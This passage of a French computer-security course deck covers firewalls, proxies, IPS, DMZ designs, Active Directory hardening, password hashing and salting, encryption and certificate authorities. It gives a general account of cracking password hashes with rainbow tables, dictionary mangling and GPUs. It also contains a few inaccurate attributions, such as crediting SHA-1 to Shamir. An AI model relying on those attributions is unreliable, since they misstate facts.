[Link]:20  [Link]:8002 [Link]:80  [Link]:6789

[Link]@[Link] Sécurité Informatique/ November 28, 2021 242 / 506

NAT et Filtrage : Netfilter

Interface(s) Interface(s)
PREROUTING FORWARD POSTROUTING

User-defined
INPUT OUTPUT
User-defined

Processus

[Link]@[Link] Sécurité Informatique/ November 28, 2021 243 / 506

Pare-feu deep-inspection

Terme à relent marketing

Evolution du stateful inspection
Vérifie la conformité aux RFC
A la limite du relais applicatifs (cf suite)
Mais est-ce différent des IPS ?
Concurrencé par la Firewall NG "Next Generation"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 244 / 506

Pare-feu Next-Generation

Terme à relent marketing

Evolution du stateful inspection
utilisation de paramètres supplémentaires
l’identité de la personne
l’application (et non plus le port), surtout que tout passe par
le 80.
Facebook
Gmail
GoogleDrive

[Link]@[Link] Sécurité Informatique/ November 28, 2021 245 / 506

Pare-feu Next-Generation

Recouvre beaucoup de réalités

Comment se fait la détection de la personne
Par remontée de l’authentification AD ?
Par l’installation d’un client ?
Comment-est utilisée cette authentification ?
Une personne <=> 1 IP ?
Une communication <=> 1 personne ?
Est-ce dynamique ?
Comment sont détectées les applications ?
par schéma ? (donc abonnement ?)
par url ?
par IP ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 246 / 506

Pare-feu NG : avantages

Simplicité de la maintenance (changement d’IP = pas de

changement de droit)
On sait QUI a accès.
On devient très fin dans le filtrage.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 247 / 506

Pare-feu NG : inconvénients

Incompatible avec du "wirespeed" (reconstitution des paquets)

Ne pourra jamais aller aussi loin qu’un relais applicatif
Dégâts collatéraux

[Link]@[Link] Sécurité Informatique/ November 28, 2021 248 / 506

Pare-feu NG : acteurs

Palo Alto
iptables + L7 Filter + NuFW (UFWi)
Maintenant tout FW est forcément NG.....

[Link]@[Link] Sécurité Informatique/ November 28, 2021 249 / 506

Les I.P.S.

Intrusion Prevention System

Encore un niveau supplémentaire vis-à-vis du deep-inspection
Réassemble les paquets
Normalise les communications
Vérifie la conformité aux RFC
Les compare à une base d’attaque
C’est un routeur qui fait de la détection d’intrusion et qui agit
: IDS (Intrusion Detection System) n’était pas assez vendeur

[Link]@[Link] Sécurité Informatique/ November 28, 2021 250 / 506

Protection IPS : Avantages

Peut protéger d’attaques très sophistiquées

Ne nécessite pas de modification d’architecture ou des clients
Parfois inattaquable car indétectable (pas d’adresse IP)
Peut couper ou limiter des flux interdits

[Link]@[Link] Sécurité Informatique/ November 28, 2021 251 / 506

Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison de

schémas)
Demande une machine adaptée au débit pour des coupures
complexes
Dégâts collatéraux plus nombreux que le deep inspection

[Link]@[Link] Sécurité Informatique/ November 28, 2021 252 / 506

Protection IPS : Exemples

StormShield.
Tippingpoint
Snort Inline
Guardian pour iptables
Iptables et module string (très très limité)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 253 / 506

Protection IPS : Inconvénients

Plus lent encore que le deep inspection (comparaison de

schémas)
Demande une machine adaptée au débit pour des coupures
complexes
Dégâts collatéraux plus nombreux que le deep inspection

[Link]@[Link] Sécurité Informatique/ November 28, 2021 254 / 506

Protection IPS : Questions à poser

Nombre de règles
Mise à jour des règles (qui, d’où)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 255 / 506

Les boites noires

Les firewall tout faits :

Ont un OS
CISCO IOS-XR => QNX Neutrino
Juniper JunOS => FreeBSD 4.10
Alcatel TimOS => VXWorks
Huawei VRP => VXWorks
StormShield => FreeBSD
SideWinder => Linux (SeLinux)
Sont parfois aidés de composants

[Link]@[Link] Sécurité Informatique/ November 28, 2021 256 / 506

Boites noires et circuits

L’aide hardware est précieuse

Plus rapide
Moins chère
Moins consommatrice
Mais elle pose des problèmes
ASICs : rapides, économiques mais fixes et peu intelligents
FPGA : assez rapides, modifiables mais peu intelligents
Network processors : intelligents, relativement rapides mais
gourmands et chers

[Link]@[Link] Sécurité Informatique/ November 28, 2021 257 / 506

Les relais

Après les douves, les ponts

[Link]@[Link] Sécurité Informatique/ November 28, 2021 258 / 506

Relais : Définition

Les relais travaillent sur le passage et non la coupure

Le principe est : "laisse faire un professionnel."
Ils dissimulent le client (authentification externe par l’adresse
IP)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 259 / 506

Relais : Définition (2)

Réseaux & serveurs Réseaux locaux

distants
Relais

[Link]@[Link] Sécurité Informatique/ November 28, 2021 260 / 506

Relais : Définition (3)

Si on ne coupe pas:

[Link]@[Link] Sécurité Informatique/ November 28, 2021 261 / 506

Relais : Définition (4)

Relais R

R-S
Règles Serveur S

C-R Accepte
Décision
Port
du
relais R-S2
Machine Redirige
cliente C

Interdit Serveur S2
Logs

[Link]@[Link] Sécurité Informatique/ November 28, 2021 262 / 506

Les relais génériques

La standardiste
C’est un relais générique
Généralement placé au niveau circuit (TCP ou UDP)
La communication C-R encapsule la communication C-S.
Le client demande au relais une communication à l’extérieur
Autorisation basée sur
l’origine (machine, port)
la destination (machine, port)
l’identification ou l’authentification du client pour tout
protocole

[Link]@[Link] Sécurité Informatique/ November 28, 2021 263 / 506

Relais circuit : Avantages

Laisse passer beaucoup de protocoles

Permet de bloquer
Sur l’origine et la destination
L’identité de l’utilisateur
Journalise
Les protagonistes (leur IP, leur port)
Taille, durée, identité, etc..
Simplicité du serveur
Règles simples
Simplicité du client
Un paramétrage une fois pour toutes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 264 / 506

Relais circuit : Inconvénients

Lent
Tous les protocoles ne passent pas
Ne comprend pas la communication
Nécessite l’installation d’une partie cliente
Intégrée dans les outils
Intégrée dans le système par des librairies
Empêche la notion de serveur

[Link]@[Link] Sécurité Informatique/ November 28, 2021 265 / 506

Relais circuit : Trucs

Différencier relais d’entrée et relais de sortie

Les relais de sortie doivent refuser l’entrée
Préférer les relais applicatifs si possible

[Link]@[Link] Sécurité Informatique/ November 28, 2021 266 / 506

Relais circuit : Options courantes

Chiffrement entre le client et le relais

Authentification
Tunneling

[Link]@[Link] Sécurité Informatique/ November 28, 2021 267 / 506

Relais circuit : Exemples

Un seul exemple définit par une RFC (dite AFT advanced

Firewall Traversal)
Les socks
Plusieurs implémentations (dont certaines gratuites)
Nec (serveur et client)
Hummingbird (client)
Dante (serveur et client unix)
Msproxy (en partie)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 268 / 506

Les relais applicatifs

[Link]@[Link] Sécurité Informatique/ November 28, 2021 269 / 506

Relais applicatifs : Définition

Le client fait une demande de connexion au relais dans le

même protocole
Le relais traite la demande et la retransmet au serveur
Il renvoie la réponse au client
La communication C-R est conforme au protocole relayé
R comprend la communication
R peut intervenir dans la communication
Squid : accélération, transforme les urls, etc.
Sendmail/Postfix : ajoutent des entêtes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 270 / 506

Relais applicatifs : Avantages

Compréhension totale du protocole

Filtrage extrêmement fin
Journalisation complète
Protection plus efficace
Authentification facilement intégrable
Nombreuses fonctionnalités complémentaires
Parfois seul moyen de passer (X11)
Utilisés en relais d’entrée, ils protègent efficacement les
serveurs

[Link]@[Link] Sécurité Informatique/ November 28, 2021 271 / 506

Relais applicatifs : Inconvénients

Il faut un relais par protocole

Il y a peu de protocoles relayés
C’est le plus lent des relais
Consommateur de CPU
Plus complexe, et donc plus vulnérable
Chaque logiciel doit-être configuré (sauf si redirection
transparente)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 272 / 506

Relais applicatifs : options courantes

Lutte antivirale
Filtrage d’action (put, get pour le ftp)
Filtrage d’URLs
Cache (optimisation du trafic)
Authentification

[Link]@[Link] Sécurité Informatique/ November 28, 2021 273 / 506

Relais applicatifs : Trucs

Penser à empêcher l’entrée par leur biais

Attention aux modules génériques qui n’ont pas les avantages
des relais applicatifs (voir relais circuit)
Ne pas croire qu’ils sont la panacée !! (httptunnel)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 274 / 506

Relais applicatifs : Exemples

Squid (http, https, ftp)

Fwtk (http, ftp, telnet, X11, rlogin, pop, sqlnet générique
(TCP)). Mais ne bouge plus depuis plusieurs années.
Serveurs SMTP, DNS, NTP (par définition)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 275 / 506

Relais applicatifs : Exercice

Installation d’un relais Squid + SquidGuard

Apt-get install squid
Apt-get install squidGuard
Apt-get install chastity-list
[Link] (url_rewrite_program /usr/bin/squidGuard -c
/etc/chastity/[Link])

[Link]@[Link] Sécurité Informatique/ November 28, 2021 276 / 506

Le mélange des genres

Complémentarité visible
Quelques pare-feu intègrent 2 processus
Filtrage stateful qui renvoie vers
des Relais applicatifs transparents

[Link]@[Link] Sécurité Informatique/ November 28, 2021 277 / 506

Choix entre ces 4 (5) types

Dépend
De la sécurité exigée
De la vitesse nécessaire
Du budget disponible
Des exigences des utilisateurs
Rarement limité à un seul type
Ils sont très complémentaires.
Les relais ne sont rien sans des interdictions

[Link]@[Link] Sécurité Informatique/ November 28, 2021 278 / 506

Les astuces générales

Utiliser un serveur Syslog centralisé

Synchroniser les horloges par NTP
Bien segmenter son réseau (règles simples)
Eviter de nuire aux utilisateurs !!!!

[Link]@[Link] Sécurité Informatique/ November 28, 2021 279 / 506

Pare-feu : le faire soi-même

Choisir un OS bien maîtrisé

Ne PAS ENCORE LE CONNECTER
Partitionner correctement le disque (/var)
Patcher l’OS et les logiciels
Pas de compte utilisateur
Enlever les services non indispensables
Faire une synchronisation NTP du PF

[Link]@[Link] Sécurité Informatique/ November 28, 2021 280 / 506

Pare-feu : le faire soi-même : mode paranoiaque

Limitez les logiciels

chroot et chuid des processus (UNIX)
Un uid par processus
Application de patch noyaux durcis
grsecurity [Link]
openwall [Link]
Selinux

[Link]@[Link] Sécurité Informatique/ November 28, 2021 281 / 506

Pare-feu : le faire soi-même : mode paranoiaque

Mettre ce qui possible en immuable

chmod +t en unix
monter les partitions en Read Only
Faire une empreinte du système
Tripwire [Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 282 / 506

Les architectures

[Link]@[Link] Sécurité Informatique/ November 28, 2021 283 / 506

Les architectures disponibles

Leur fonctionnement dépend des pare-feux utilisés

Les architectures dépendent
Du budget
Du temps disponible
Des compétences locales
Des choix de la politique de sécurité

[Link]@[Link] Sécurité Informatique/ November 28, 2021 284 / 506

Bastion externe

Réseau extérieur

Pare-feu

Ressources privées

Ressources publiques

Zone dangereuse

Zone semi-protégée

Zone protégée

[Link]@[Link] Sécurité Informatique/ November 28, 2021 285 / 506

Bastion externe

Les plus
Protège tout le réseau
L’accès aux serveurs publics est rapide
Les moins
Si le serveur public est compromis ....
Si le PF est compromis ....

[Link]@[Link] Sécurité Informatique/ November 28, 2021 286 / 506

Bastion interne

[Link]@[Link] Sécurité Informatique/ November 28, 2021 287 / 506

Bastion interne

Les plus
Si les serveurs publics compromis => PF
Les moins
Les serveurs publics sont moins accessibles
Si le PF est compromis ....

[Link]@[Link] Sécurité Informatique/ November 28, 2021 288 / 506

DMZ ou Zone Semi-Ouverte

[Link]@[Link] Sécurité Informatique/ November 28, 2021 289 / 506

DMZ

Les plus
Tout le réseau est protégé
Si serveurs publics compromis => PF2
Si PF1 compromis => PF2
Les moins
Les serveurs publics sont moins accessibles (sauf si PF2
filtrant)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 290 / 506

DMZ : PF à interfaces multiples

[Link]@[Link] Sécurité Informatique/ November 28, 2021 291 / 506

DMZ : PF à interfaces multiples

Les plus
Moins cher
Plus facile à administrer
Même technologie pour toutes les DMZ
Les moins
Si PF compromis ...
Règles plus complexes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 292 / 506

DMZ : compléments

Combien de DMZ ?
1 pour les serveurs publics
1 pour les entrées
1 pour les sorties
....

[Link]@[Link] Sécurité Informatique/ November 28, 2021 293 / 506

Architecture : choix à effectuer

Quels sont les types de PF utilisés ?

Les clients internes sortent-ils directement ?
Plus souple, plus rapide, moins sûr
Les clients sont-ils obligés de "relayer" ?
Plus sûr, moins rapide, moins souple

[Link]@[Link] Sécurité Informatique/ November 28, 2021 294 / 506

Architecture : trucs

Mettre un serveur syslog à l’intérieur

Empêcher le DNS de résoudre les adresses IP internes pour
l’extérieur
Les serveurs publics sont des semi-copies de serveurs internes
LDAP, Web, etc..

[Link]@[Link] Sécurité Informatique/ November 28, 2021 295 / 506

Critères de choix

Pas de "meilleur" pare-feu, uniquement un plus adapté que les

autres.
Position dans l’organisme (en entrée, devant un laboratoire)
Hiérarchie des priorités
Vitesse
Protection entrante
Protection sortante

[Link]@[Link] Sécurité Informatique/ November 28, 2021 296 / 506

Définir ses besoins :Quel trafic ?

Faire une analyse de trafic

Mettre un NIDS
Analyser les attaques
Permet de justifier des budgets (surtout s’il y a de beaux
graphiques)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 297 / 506

Vérifier son pare-feu

NMAP
Services visibles par un pirate
Filterrules
Analyse des filtres réellement en place
NIDS après le PF
Vérifie que rien ne passe.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 298 / 506

Gérer son pare-feu

Configurer
Interface graphique ?
Console ?
A distance ?
Console d’administration centrale
Par telnet ou ssh
Sur la console ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 299 / 506

Pare-feu : l’arme absolue ?

Avez-vous vu passer NIMDA ?

Compléments indispensables
IDS et NIDS
Anti-Virus
Suivre l’actualité sécuritaire
Problèmes de légalité

[Link]@[Link] Sécurité Informatique/ November 28, 2021 300 / 506

Architecture Windows

La protection d’une architecture Windows

[Link]@[Link] Sécurité Informatique/ November 28, 2021 301 / 506

Les postes Windows

Protection des postes Windows

[Link]@[Link] Sécurité Informatique/ November 28, 2021 302 / 506

Les actions

Mettre à jour
Ne pas laisser les utilisateurs être administrateur
Mettre un logiciel de protection
Un antivirus
EDR, voire XDR

[Link]@[Link] Sécurité Informatique/ November 28, 2021 303 / 506

Architecture Active Directory

[Link]@[Link] Sécurité Informatique/ November 28, 2021 304 / 506

Protéger un Active Directory

[Link]@[Link] Sécurité Informatique/ November 28, 2021 305 / 506

Utilisation de PingCastle

Utilisation de PingCastle (mais il y en a d’autres).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 306 / 506

Utilisation de PingCastle

Résultats Pingcastle

[Link]@[Link] Sécurité Informatique/ November 28, 2021 307 / 506

Le chiffrement

Le Chiffrement

[Link]@[Link] Sécurité Informatique/ November 28, 2021 308 / 506

Le chiffrement

Les condensats (Hash)

La signature
Le chiffrement symétrique
Le chiffrement asymétrique
Les certificats

[Link]@[Link] Sécurité Informatique/ November 28, 2021 309 / 506

Hashage: définition

Transformation d’une suite d’octets de longueur généralement

quelconque en une suite de longueur finie,
Souvent appelé "condensat",
Génère une "empreinte" pseudo-unique,
Cette opération est constante (même fichier, même hash),
Cette opération est non réversible.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 310 / 506

Hashage: Exemple "physique"

Soit un livre comme suite d’octets (les caractères)

Soit la procédure de hash constituée de la suite des nombres
de chaque voyelle de l’alphabet séparés par un ";"
Guerre et paix, première partie
"065708;116977;061014;042163;046941;002179"
Texte "zut"
"000000;000000;000000;000000;000001;000000"

[Link]@[Link] Sécurité Informatique/ November 28, 2021 311 / 506

Hashage: utilité

Le "Hash" est utilisé pour garantir l’intégrité des données

Il permet de vérifier l’égalité d’un mot de passe, sans en
conserver l’original
Une petite modification du fichier original donne une grande
variation du Hash (généralement)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 312 / 506

Exemples de Hashage

Type hash Possibilités

CRC 962675537 1.0e10
MD5 (Rivest) 70a877fc1b58566cbb386c5a5abb0a90 3.4e38
SHA-1 (Shamir) 7e06cace131b2caf2333a3d529cc20981190081b 1.4e48
SHA-256 877992bcd92b8dc12dbfff724bfd0e0696b61400bd576ef4b1b6e281a410f3f4 1.5e77

[Link]@[Link] Sécurité Informatique/ November 28, 2021 313 / 506

Hashage: utilisation pour les mots de passe

Génération :
Alice choisit son mot de passe M1
Le système "hashe" M1 pour obtenir HASH1
Le système ne conserve que HASH1
Utilisation
Alice se reconnecte, en tapant le mot de passe M2
(normalement identique à M1)
Le système hashe M2 et obtient HASH2
Si HASH2=HASH1 alors M2=M1, donc OK

[Link]@[Link] Sécurité Informatique/ November 28, 2021 314 / 506

Hashage: casser les mots de passe ?

On sait que
Les "hash" ne sont pas réversibles.
Pourtant on peut les "casser" (s’ils sont "devinables").
Question: comment ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 315 / 506

Hashage: casser les mots de passe

Il suffit de créer des "rainbow tables"

On prend des dictionnaires
français,
anglais,
starwars, klingon, elfique.
On les "dérive" (John the Ripper fait cela très bien)
en les transformant (tout ou partie) en majuscules,
en ajoutant des chiffres,
en les inversant, etc..
puis on compare...

[Link]@[Link] Sécurité Informatique/ November 28, 2021 316 / 506

Hashage: problème

Un truc: Ces tables existent déjà sur Internet.

Pas la peine de se fatiguer.
Elles font 40 Go pour les plus grosses
Plus simple: cherchez "md5 decode" sur Google....
La solution : ajouter un "sel" (salt en anglais)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 317 / 506

Hashage: Le sel

La séquence.
Alice donne pour la première fois son mot de passe M1
Le système qui reçoit le mot de passe:
génère, à l’insu de Alice, une chaine S1 (le sel) par exemple
Ag12kA, différent pour chaque utilisateur,
calcule HASH1=hash( M1 + S1),
stocke dans sa base de donnée "Alice", HASH1 et S1 (car il
est le seul à le connaitre).
Pour vérifier le système
récupère le S1 associé à Alice,
calcule HASH2=hash(M2 + S1),
compare HASH2 et HASH1,

[Link]@[Link] Sécurité Informatique/ November 28, 2021 318 / 506

Hashage: cassage de mot de passe "salés"

Le sel choisi faisait 6 caractères parmi

26 majuscules
26 minuscules
10 chiffres
Ce qui fait (10 + 26 + 26) puissance 6, fois plus de
possibilités
Soit 56 milliards !
Les rainbow table vont devoir faire 56 milliards * 40Go.
C’est fini ?

[Link]@[Link] Sécurité Informatique/ November 28, 2021 319 / 506

Hashage: les aides matérielles

La puissance processeur double tous les 18 mois (loi de Moore)

Progrès mathématiques sur les chiffrements asymétriques :
rapidité doublée tous les 18 mois avec des sauts sporadiques
Budget d’un attaquant double tous les 10 ans
Actuellement ([Link] pour une AMD 7970
(150 €)
8,5 milliards de MD5 par seconde (52 avec une NVIDIA 3080
RTX)
416 millions de SHA512 par seconde
179 millions de SHA-3 par seconde
141000 WPA2 par seconde

[Link]@[Link] Sécurité Informatique/ November 28, 2021 320 / 506

Hashage: conséquences

Quand le pirate vole les mots de passe, les "sels" sont avec
On ne peut pas utiliser les rainbow tables
Mais on peut recalculer les hash avec le sel
Si on a un dictionnaire avec les 630 millions de mot de passe
les plus courants (disponible sur le net).
Il ne faut que..... 0,07 seconde pour calculer le hash MD5 avec
la méthode précédente.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 321 / 506

Hashage: les pistes suivantes

Ajouter du poivre (un "sel" supplémentaire, identique pour

tous les comptes mais pas dans les bases donc inconnu par les
pirates)
Faire du hash de hash de hash ... de hash (et ce plusieurs
milliers de fois)
Utiliser des algorithmes spécifiques....

[Link]@[Link] Sécurité Informatique/ November 28, 2021 322 / 506

Hash de mot de passe : bcrypt et argon2

A réserver aux mots de passe : ils sont très lents

environ 1 million de fois moins rapide que MD5
même les mots de passe "simples" deviennent coûteux à
casser.
bcrypt
c’est le standard actuel
basé sur blowfish
argon2
a gagné le concours 2015 du meilleur algo de hash de mot de
passe
2 versions : l’une résiste mieux aux GPU, l’autre aux
"side-channels".

[Link]@[Link] Sécurité Informatique/ November 28, 2021 323 / 506

Vocabulaire

Coder : rendre inintelligible une information à l’aide d’un code

Décoder : rendre intelligible une information préalablement
codée à l’aide de la clé
Décrypter : décoder mais sans le code
Chiffrer=coder
Crypter : en théorie n’existe pas (sauf pour les mots de passe).
Pour plus d’information:
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 324 / 506

Pièges du chiffrement

Un chiffrement sans clé est un mauvais chiffrement.

Un chiffrement "fermé" est un mauvais chiffrement.
Faire un bon chiffrement est compliqué.
Un bon chiffrement "théorique", s’il est mal appliqué devient
un mauvais code (exemple du chiffrement WEP pour le
Wi-Fi).

[Link]@[Link] Sécurité Informatique/ November 28, 2021 325 / 506

Chiffrement symétrique

Les clés de chiffrement et de déchiffrement sont identiques

Les algorithmes de chiffrement et déchiffrement ne sont pas
forcément identiques.
Pour communiquer il faut que Alice et Bob soient tous les 2
au courant de la clé, ce qui signifie un échange préalable

[Link]@[Link] Sécurité Informatique/ November 28, 2021 326 / 506

Chiffrement symétrique

Alice

Algorithme Bob
Message de
chiffrement Message chiffré
Algorithme
de Message
déchiffrement
Clé
de
Chiffrement

[Link]@[Link] Sécurité Informatique/ November 28, 2021 327 / 506

Chiffrement symétrique : exemples

Exemples à transposition
Code de Vigenère
XOR
Exemples à permutation
DES (64 bits), et triple DES (3DES)
IDEA
AES (actuel standard de l’armée US)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 328 / 506

Chiffrement symétrique : caractéristiques

Les chiffrements et déchiffrements sont rapides

Leur décryptage peut être très long
64 bits = 8 octets = 1,8 x 1019 possibilités
à 1 million de tests par seconde
1,8 x 1013 secondes soit 5800 siècles
AES est disponible en version 128,192 et 256 bits

[Link]@[Link] Sécurité Informatique/ November 28, 2021 329 / 506

Chiffrement symétrique : DES

Ancien standard
56 bits (64 - 8 réservés à la parité)
Version renforcée : le triple DES, mais à 2 clés. Efficacité de
113 bits
Bloc de permutation de 64 bits

[Link]@[Link] Sécurité Informatique/ November 28, 2021 330 / 506

Chiffrement symétrique : AES

[Link]
Nouveau standard (il s’appellait Rijndael à l’origine après un
concours de la NSA)
Auteurs Rijmen et Daemen
Plusieurs versions de 128, 192 ou 256 bits
Plus rapide que DES (il ne travaille qu’avec des entiers)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 331 / 506

Chiffrement asymétrique

On génère 2 clés inter-dépendantes appelées

clé publique (qui a vocation à être largement distribuée)
clé privée (qui doit absolument être protégée)
Ce qui est chiffrée par l’une est déchiffrable par l’autre, et
uniquement elle !
Il est mathématiquement impossible, dans des temps
"humains" de déduire une clé depuis l’autre.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 332 / 506

Chiffrement asymétrique

Alice

Clé publique
de Bob
Publication
sur Internet Algorithme
de
Message chiffrement

Bob

Clé publique
de Bob
Génération
du bi-clé
Algorithme
Clé privée
de Message
de Bob
déchiffrement

Message chiffré

[Link]@[Link] Sécurité Informatique/ November 28, 2021 333 / 506

Chiffrement asymétrique : avantages

La clé publique est ... publique

On peut signer les messages avec ce chiffrement (cf la suite)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 334 / 506

Chiffrement asymétrique : inconvénients

Le chiffrement est moins résistant (2048 bits RSA = 128 bits

AES),
Il est plus sensible aux progrès mathématiques,
Il est beaucoup plus lent (puissance CPU occupée de 50 à 100
fois plus importante)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 335 / 506

Chiffrement asymétrique : exemples

Méthodes
R.S.A.
Diffie Helmann
El Gamal (logarithme discret)
Courbes elliptiques
Outils
PGP
GPG
Openssl

[Link]@[Link] Sécurité Informatique/ November 28, 2021 336 / 506

Chiffrement asymétrique : PGP

Pretty Good Privacy

Auteur : Phil R. Zimmermann
Basé sur RSA
Notion d’anneau de confiance
A l’origine du standard OpenPGP (RFC 2440)

[Link]@[Link] Sécurité Informatique/ November 28, 2021 337 / 506

Chiffrement asymétrique : GPG

GNU Privacy Guard

Logiciel libre
Compatible avec PGP
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 338 / 506

Chiffrement asymétrique : RSA

Auteurs : Rivest, Shamir et Adelman

Basé sur la factorisation de nombres premiers
Le plus connu des chiffrements asymétriques

[Link]@[Link] Sécurité Informatique/ November 28, 2021 339 / 506

Chiffrement : réalité

Chiffrement asymétrique est lent, et le chiffrement symétrique

inutilisable
D’où l’idée
On échange des clés de session symétriques en les codant avec
un chiffrement asymétrique
Puis on décode en symétrique

[Link]@[Link] Sécurité Informatique/ November 28, 2021 340 / 506

Cassage de clé : en 1995

Qui budget Moyen Temps Coût Clé sûre

Hacker de passage 0,00 € ordinateur 1 semaine 45
Hacker de passage 400,00 € FPGA 5 heures 8 cents 50
Petite entreprise 10.000,00 € FPGA 12 minutes 55
Service moyen 300.000,00 € FPGA 24 secondes 60
Grosse entreprise 10.000.000,00 € FPGA 0,7s 65
Grosse entreprise 10.000.000,00 € ASIC 5 ms 0,1 cents 70
NSA,DCRI,GRU 300.000.000,00 € ASIC 0,2ms 0,1 cents 75

[Link]@[Link] Sécurité Informatique/ November 28, 2021 341 / 506

Cassage de clé : évolution

La vision en 2001 :
1982 1992 2002 2012 2022 2032
symétrique 56 64 72 80 87 95
RSA/log discret 417 682 1028 1464 1995 2629
DSS 102 114 127 141 154 168
Courbes elliptiques 135 149 164 179

La recommandation actuelle en 2017 du BSI (Allemand)

128 bits pour du symétrique
2000 bits pour du RSA
250 bits pour de l’elliptique et de l’algorithme discret
Référence : EPFL 2001
Référence : keylength

[Link]@[Link] Sécurité Informatique/ November 28, 2021 342 / 506

Chiffrement asymétrique : Signature

La signature est la garantie

De l’identité de l’expéditeur du message
De l’intégrité du message
La procédure
On prend l’empreinte du message
On la code avec sa clé privée
On l’expédie
Le destinataire décode l’empreinte avec la clé publique et
compare les 2 empreintes

[Link]@[Link] Sécurité Informatique/ November 28, 2021 343 / 506

Chiffrement asymétrique : Signature

Alice
Bob Message
Algo Hash Clé publique
Message Message Hash codé
Algo Chiffrement de Bob
Hash Codé

Algorithme Algorithme Algorithme

de de de
hashage hashage déchiffrement

Clé privée
Hash Hash Hash déchiffré
de Bob

Algorithme
de Comparaison
chiffrement

Hash chiffré

[Link]@[Link] Sécurité Informatique/ November 28, 2021 344 / 506

Autorité de certification

A qui appartient la clé publique ?

Possibilité d’usurpation d’identité
Utilisateur
Machine
Problème de confiance
Notion de tiers de confiance
Notion d’autorité de certification

[Link]@[Link] Sécurité Informatique/ November 28, 2021 345 / 506

Autorité de certification : création

Une "autorité de certification" est désignée "d’un commun

accord" par sa communauté
Elle génère son bi-clé (couple clé publique/clé privée)
Elle génère un certificat auto-signé
Le certificat est délivré à chaque membre de la communauté.
Les membres l’intègrent dans les navigateurs.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 346 / 506

Autorité de certification : création

Clé Publique
de Verisign
Verisign
Certificateur : Verisign
Clé publique Objet : Verisign
de Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé

hashage MD5

Clé privée
Hash
de Verisign

chiffrement RSA

Hash chiffré

[Link]@[Link] Sécurité Informatique/ November 28, 2021 347 / 506

Autorité de certification : certification

Un membre de la communauté crée son bi-clé

Il va auprès de l’Autorité d’enregistrement se faire reconnaître
et valider son certificat.
L’AE envoie la signature à l’AC
L’AC signe avec sa clé privée le certificat.
Le membre récupère le certificat et l’intègre dans son serveur.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 348 / 506

Autorité de certification : certification

BNP

Génération Publication web

Clé privée Clé publique

de BNP de BNP

Verisign

Vérification
identité

Clé publique
de BNP

Clé Publique
de BNP
Certificateur : Verisign
hashage MD5 Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé

Clé privée
Hash
de Verisign

chiffrement RSA

Hash chiffré

[Link]@[Link] Sécurité Informatique/ November 28, 2021 349 / 506

Autorité de certification : utilisation

L’utilisateur, membre de la communauté reçoit le certificat.

Il regarde dans le certificat l’AC.
Il la reconnaît et regarde si la signature du certificat est
exacte.

[Link]@[Link] Sécurité Informatique/ November 28, 2021 350 / 506

Autorité de certification : chaîne

Une AC peut-être membre d’une communauté avec elle-même

une AC
La vérification se répète :
Vérification du certificat (arrêt et validation si l’AC l’ayant
généré est reconnue)
Vérification du certificat de l’AC auprès de l’AC supérieure
(arrêt si celle-ci est reconnue).
Boucle jusqu’à
AC auto-certifiée (que l’utilisateur accepte ou non)
AC reconnue

[Link]@[Link] Sécurité Informatique/ November 28, 2021 351 / 506

Autorité de certification

Les navigateurs sont livrés avec des AC

Verisign
Comodo
etc..
Pas encore d’AC administrative française (En cours de
réflexion)
Les CRL

[Link]@[Link] Sécurité Informatique/ November 28, 2021 352 / 506

Preuve

Beaucoup de contraintes pour les signatures

[Link]@[Link] Sécurité Informatique/ November 28, 2021 353 / 506

Certificats : Une norme X509

Que contient un certificat ?

Une clé publique
Un identifiant (email ou nom de machine)
Un rôle (chiffrement, signature, AC)
Des renseignements administratifs

[Link]@[Link] Sécurité Informatique/ November 28, 2021 354 / 506

Certificats : Une norme X509

Certificate:
Data:
Version: 1 (0x0)
Serial Number: 7829 (0x1e95)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,
CN=Thawte Server CA/emailAddress=server-certs@[Link]
Validity
Not Before: Jul 9 [Link] 1998 GMT
Not After : Jul 9 [Link] 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,
OU=FreeSoft, CN=[Link]/emailAddress=baccala@[Link]
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
[Link]
...
[Link]
[Link]
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
[Link]
....
[Link]

[Link]@[Link] Sécurité Informatique/ November 28, 2021 355 / 506

Les AC pré-chargées

[Link]@[Link] Sécurité Informatique/ November 28, 2021 356 / 506

Le chiffrement homomorphe et le chiffrement fonctionnel

récent : 2009 pour les vrais débuts

Le chiffrement homomorphe
permet de faire des "calculs" sur des données chiffrées
le résultat est chiffré.
Le chiffrement fonctionnel
